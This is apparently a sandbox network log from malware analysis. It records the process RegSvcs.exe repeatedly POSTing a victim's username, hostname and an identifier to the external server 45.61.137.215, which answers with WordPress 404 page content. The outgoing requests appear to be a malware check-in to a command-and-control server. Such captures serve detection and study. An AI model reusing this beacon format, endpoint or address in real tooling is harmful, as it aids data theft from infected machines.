May 29, 2024 15:42:36.438196898 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:36.438206911 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:42:36.438265085 CEST	224	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !impo
May 29, 2024 15:42:36.438273907 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:42:36.438282013 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:42:36.438488960 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:36.438508987 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:36.438519001 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49724	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:36.746085882 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:36.751032114 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:39.194941998 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:37 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:39.194978952 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:39.194992065 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:39.195003986 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:39.195017099 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:42:39.195029020 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:42:39.195656061 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:39.195713043 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:39.195751905 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:42:39.195765972 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49725	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:39.353995085 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:39.358983040 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:41.803802013 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:39 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:41.803814888 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:42:41.803833008 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:42:41.803842068 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 29, 2024 15:42:41.803853035 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:42:41.803885937 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:42:41.803896904 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:42:41.804090977 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:41.804133892 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:41.804143906 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49726	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:41.960860968 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:41.967647076 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:47.378247976 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:45 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
